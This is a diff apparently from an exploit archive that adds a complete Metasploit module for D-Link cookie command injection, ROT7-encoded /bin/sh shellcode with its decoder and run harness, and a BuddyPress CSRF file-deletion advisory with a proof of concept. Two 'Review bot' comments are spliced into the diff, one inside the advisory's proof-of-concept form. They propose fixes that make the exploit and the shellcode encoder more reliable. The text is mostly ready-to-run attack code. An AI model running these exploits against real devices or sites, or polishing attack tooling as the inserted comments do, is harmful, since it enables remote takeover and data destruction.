diff --git a/files.csv b/files.csv
index c66026290..e9d92dfe5 100755
--- a/files.csv
+++ b/files.csv
@@ -33849,6 +33849,7 @@ id,file,description,date,author,platform,type,port
 37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
 37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0
+37495,platforms/lin_x86/shellcode/37495.py,"Linux x86 /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
 37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-17,snup,php,webapps,0
 37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload Vulnerability",2012-07-13,KedAns-Dz,php,webapps,0
 37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection Vulnerabilities",2012-07-15,ToXiC,php,webapps,0
@@ -33960,3 +33961,5 @@ id,file,description,date,author,platform,type,port
 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
+37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0
+37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80
diff --git a/platforms/hardware/remote/37628.rb b/platforms/hardware/remote/37628.rb
new file mode 100755
index 000000000..e428b305c
--- /dev/null
+++ b/platforms/hardware/remote/37628.rb
@@ -0,0 +1,152 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link Cookie Command Execution', + 'Description' => %q{ + This module exploits an anonymous remote upload and code execution vulnerability on different + D-Link devices. The vulnerability is a command injection in the cookie handling process of the + lighttpd web server when handling specially crafted cookie values. This module has been + successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment. + }, + 'Author' => + [ + 'Peter Adkins ', # vulnerability discovery and initial PoC + 'Michael Messner ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'References' => + [ + ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC + ], + 'DisclosureDate' => 'Jun 12 2015', + 'Payload' => + { + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'MIPS Little Endian', # unknown if there are LE devices out there ... 
but in case we have a target + { + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE + } + ], + [ 'MIPS Big Endian', + { + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE + } + ] + ], + 'DefaultTarget' => 1 + )) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + + if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/ + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + print_status("#{peer} - Trying to access the device ...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") + end + + print_status("#{peer} - Uploading stager ...") + @counter = 1 + execute_cmdstager( + :flavor => :echo, + :linemax => 95 # limited by our upload, larger payloads crash the web server + ) + + print_status("#{peer} - creating payload and executing it ...") + + (1 .. @counter).each do |act_file| + # the http server blocks access to our files ... 
we copy it to a new one + # the length of our command is restricted to 19 characters + cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}" + execute_final_command(cmd) + cmd = "chmod +x /tmp/#{act_file+@counter}" + execute_final_command(cmd) + cmd = "/tmp/#{act_file+@counter}" + execute_final_command(cmd) + cmd = "rm /tmp/#{act_file}" + execute_final_command(cmd) + cmd = "rm /tmp/#{act_file+@counter}" + execute_final_command(cmd) + end + end + + def execute_command(cmd,opts) + # upload our stager to a shell script + # upload takes quite long because there is no response from the web server + + file_upload = "#!/bin/sh\n" + file_upload << cmd << "\n" + + post_data = Rex::MIME::Message.new + post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"") + post_data.bound = "-#{rand_text_alpha(12)}--" + file = post_data.to_s + + @counter = @counter + 1 + + begin + send_request_cgi({ + 'method' => 'POST', + 'uri' => "/web_cgi.cgi", + 'vars_get' => { + '&request' =>'UploadFile', + 'path' => '/tmp/' + }, + 'encode_params' => false, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => file + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + + end + + def execute_final_command(cmd) + # very limited space - larger commands crash the webserver + fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18 + begin + send_request_cgi({ + 'method' => 'GET', + 'uri' => "/", + 'cookie' => "i=`#{cmd}`" + }, 5) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end +end \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/37495.py b/platforms/lin_x86/shellcode/37495.py new file mode 100755 index 000000000..f71c84d3e --- /dev/null +++ b/platforms/lin_x86/shellcode/37495.py 
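Review bot: The final loop in `exploit`, `(1 .. @counter).each do |act_file|`, runs one iteration past the last uploaded stager: `execute_command` names each upload with the current `@counter` and only then does `@counter = @counter + 1`, so when the stager finishes `@counter` is one higher than the highest filename and the last pass fires five cookie injections (`cp`, `chmod`, exec, two `rm`) against a `/tmp/<n>` that was never created. Change it to `(1 ... @counter).each do |act_file|` so the copy/execute/cleanup sequence covers exactly the files that exist. Separately, the comment in `execute_final_command` says the command is restricted to 19 characters while the guard is `cmd.length > 18`; if a payload needs roughly fifty or more echo chunks, `act_file+@counter` reaches three digits and `cp /t*/50 /tmp/101` is 18 but `cp /t*/51 /tmp/102` is 18 too, whereas `cp /t*/100 /tmp/200` is 19 and trips `fail_with` after the scripts have already been written to the device. Align the comment with the actual limit, and consider a `cleanup` override that removes leftover `/tmp/<n>` stagers on failure, since the in-band `rm` commands only run if every earlier step succeeds.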
@@ -0,0 +1,104 @@ +# Shellcode Title: ROT7 +# Date: 5 July 2015 +# Exploit Author: Artem Tsvetkov +# Software Link: +https://github.com/adeptex/SLAE/tree/master/Assignment-6/rot7 +# Tested on: Kali GNU/Linux 1.1.0 +# Platform: x86 Linux + +This code was created as an exercise for the SecurityTube Linux Assembly +Expert (SLAE). + +The following will produce rot7-encoded shellcode using a custom scheme to +dynamically set the shellcode length. The length is used by the decoder to +determine when it should stop decoding. + + + + +#!/usr/bin/python +# Python ROT-7 Encoder +# execve 24 bytes +shellcode = ( + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31" + "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" +) + +# byte[0] == shellcode length +encoded = "\\x%02x," % len(bytearray(shellcode)) +encoded2 = "0x%02x," % len(bytearray(shellcode)) + +print 'Encoded shellcode ...' + +for x in bytearray(shellcode) : +# boundary is computed as 255-ROT(x) where x, the amount to rotate by + if x > 248: + encoded += '\\x' + encoded += '%02x' %(7 -(256 - x)) + encoded2 += '0x' + encoded2 += '%02x,' %(7 -(256 - x)) + else: + encoded += '\\x' + encoded += '%02x'%(x+7) + encoded2 += '0x' + encoded2 += '%02x,' %(x+7) + +print '\n%s\n\n%s\n\nShellcode Length: %d\n' % (encoded, encoded2, +len(bytearray(shellcode))) + + + + +The following is the NASM decoder: + + +; ROT7 NASM decoder +global _start +section .text +_start: + jmp short stage + +decoder: + pop esi ; shellcode address + mov al, byte [esi] ; shellcode length + xor ecx, ecx ; position + +decode: + mov bl, byte [esi+ecx+1] ; get rot'ed byted + sub bl, 0x7 ; rot it back (-7) + mov byte [esi+ecx], bl ; store it in shellcode + inc ecx ; next position + cmp al, cl ; check if reached the end of shellcode + jnz short decode ; if not, continue derot'ing + jmp shellcode ; else, execute derot'ed shellcode + +stage: + call decoder + + ; Shellcode Format: + ; byte[0] = length of shellcode (max 0xff) + ; byte[1..] 
= rot'ed shellcode + shellcode: db +0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87 + + + + +/* +* Sample run +* +* Compile with: gcc rot7.c -o rot7 +* +*/ +#include +#include + +unsigned char code[] = \ +"\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87"; + +int main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} diff --git a/platforms/php/webapps/37629.txt b/platforms/php/webapps/37629.txt new file mode 100755 index 000000000..28cb33abe --- /dev/null +++ b/platforms/php/webapps/37629.txt @@ -0,0 +1,62 @@ +Details +================ +Software: BuddyPress Activity Plus +Version: 1.5 +Homepage: http://wordpress.org/plugins/buddypress-activity-plus/ +Advisory report: https://security.dxw.com/advisories/csrf-and-arbitrary-file-deletion-in-buddypress-activity-plus-1-5/ +CVE: Awaiting assignment +CVSS: 8.5 (High; AV:N/AC:L/Au:N/C:N/I:P/A:C) + +Description +================ +CSRF and arbitrary file deletion in BuddyPress Activity Plus 1.5 + +Vulnerability +================ +An attacker can delete any file the PHP process can delete. +For this to happen, a logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing. + +Proof of concept +================ +Ensure your PHP user can do maximum damage: +sudo chown www-data:www-data /var/vhosts/my-wordpress-site +Visit a page containing this as a logged-in user and click submit: +
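Review bot: The encoder does not check that its output stays null-free: in the `if x > 248` branch a plaintext byte `0xf9` becomes `7 - (256 - 0xf9)`, which is `0x00`, and the C harness later measures the buffer with `strlen(code)`, so such a payload would be silently truncated before the decoder ever runs. Add a guard in the loop, e.g. `assert (x + 7) & 0xff != 0, "ROT7 produced a null byte at offset %d" % i` (enumerating the bytearray), so the author learns at encode time that this input needs a different rotation. The length prefix is also a single byte (the decoder loads it with `mov al, byte [esi]` and compares with `cmp al, cl`), yet `"\\x%02x," % len(...)` happily emits three hex digits for payloads over 255 bytes; `assert len(shellcode) <= 0xff, "shellcode too long for one-byte length prefix"` before building `encoded` closes that gap. As a style point, the two branches of the loop are equivalent to `(x + 7) & 0xff`, which would make the wrap-around intent clearer than the `256 - x` arithmetic.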
+ + + +
+If the server is set up so that the php user has more restricted permissions, then an attacker will at least be able to delete files from the uploads directory. +Note that you can also delete as many things as you like at once – $_POST[‘data’] is run through parse_str() which parses it as a query string, so just keep adding “&bpfb_photos[]=path/to/file” to the end until you have all known files. +There is an identical attack available only when BP Group Documents is also installed. Just replace “bpfb_remove_temp_images” with “bpfb_remove_temp_documents” and in data replace “bpfb_photos” with “bpfb_documents”. + +Mitigations +================ +Upgrade to version 1.6.2 or later +If this is not possible, ensure that the PHP user on the server does not have permission to delete files like wp-config.php. + +Disclosure policy +================ +dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ + +Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. + +This vulnerability will be published if we do not receive a response to this report with 14 days. + +Timeline +================ + +2013-08-22: Discovered +2015-07-13: Reported to vendor via contact form at https://premium.wpmudev.org/contact/ +2015-07-13: Requested CVE +2015-07-13: Vendor responded +2015-07-14: Vendor reported issue fixed +2015-07-14: Published + + + +Discovered by dxw: +================ +Tom Adams +Please visit security.dxw.com for more information. + \ No newline at end of file